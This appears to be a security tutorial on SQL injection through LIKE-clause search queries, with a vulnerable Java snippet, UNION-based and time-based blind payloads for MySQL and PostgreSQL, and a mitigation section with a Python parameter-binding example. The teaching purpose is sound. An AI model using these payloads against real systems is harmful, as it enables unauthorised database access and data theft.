Vulnerable Code
LIKE clauses are heavily used in search features. Developers often concatenate user input directly between wildcard (%) characters. To break out, you must close the initial string quote and then either comment out or logically neutralize the trailing % and quote.

// Vulnerable Context: Input wrapped in wildcards and strings
String searchTerm = request.getParameter("search");
String query = "SELECT title, body FROM articles WHERE title LIKE '%" + searchTerm + "%'";
Where To Look For The Vulnerability
Look for any feature that searches for partial text matches.
Search Bars: Finding a user, product, or article.
URL Parameters: ?q=, ?search=, ?filter=, ?keyword=
Autocomplete/Typeahead: API endpoints that fetch results as you type.
-- Universal Bypass (Works on Contains, Starts With, and Ends With)
test' UNION {SELECT_query}--

-- Logical Closures (Use if comments are filtered)
-- For "Contains" (LIKE '%{input}%'):
test' UNION {SELECT_query} AND '%'='
-- For "Starts With" (LIKE '{input}%'):
test' UNION {SELECT_query} AND '%'='
-- For "Ends With" (LIKE '%{input}'):
test' UNION {SELECT_query} AND ''='

-- Syntax: [Valid Search]' AND [Sleep Function]--
-- MySQL: If user is admin, sleep 5 seconds
test' AND IF((SELECT user)='admin', SLEEP(5), 0)--
-- PostgreSQL:
test' AND (SELECT CASE WHEN ((SELECT current_user)='admin') THEN pg_sleep(5) ELSE pg_sleep(0) END)--
Mitigation
Fix: Use prepared statements, binding the whole pattern (including the surrounding % wildcards) as a parameter. Prepared statements stop injection but do not neutralize wildcards: if the application needs to treat user input as literal characters rather than wildcards, the user's % and _ characters must be manually escaped (e.g., \%, \_) before being passed to the query.
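The mitigation above, as an added example that is not the page's own code: it is written in Python with sqlite3 rather than the page's Java, binds the LIKE pattern as a parameter, and escapes % and _ with an explicit ESCAPE clause (SQLite has no default escape character, so naming one keeps the query portable). The articles table and its rows are constructed for the demo.

```python
import sqlite3

# Constructed sample data (not from the page): rows a search feature might query.
ARTICLES = [
    ("100% cotton shirts", "product listing"),
    ("Test results", "weekly report"),
    ("Testing guide", "how-to"),
    ("snake_case naming", "style note"),
]


def escape_like(term: str, esc: str = "\\") -> str:
    """Make user input match literally inside a LIKE pattern.

    The escape character itself is doubled first, then % and _ are
    prefixed with it. The same character must be named in the query's
    ESCAPE clause; do not rely on a backend's default escape character."""
    return (term.replace(esc, esc + esc)
                .replace("%", esc + "%")
                .replace("_", esc + "_"))


def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (title TEXT, body TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", ARTICLES)
    return conn


def search_bound_only(conn: sqlite3.Connection, term: str) -> list:
    """Parameter binding alone: immune to injection, but the user's
    % and _ still act as wildcards (a term of '_' matches every title)."""
    rows = conn.execute("SELECT title FROM articles WHERE title LIKE ?",
                        ("%" + term + "%",))
    return [r[0] for r in rows]


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Parameter binding plus escaping: the term is a literal substring."""
    pattern = "%" + escape_like(term) + "%"
    rows = conn.execute(
        "SELECT title FROM articles WHERE title LIKE ? ESCAPE '\\'",
        (pattern,))
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = open_db()
    print(search_bound_only(db, "_"))   # all four titles: '_' still a wildcard
    print(search_safe(db, "_"))         # only the title with a literal '_'
    print(search_safe(db, "test' UNION SELECT 1--"))  # []: bound as data
```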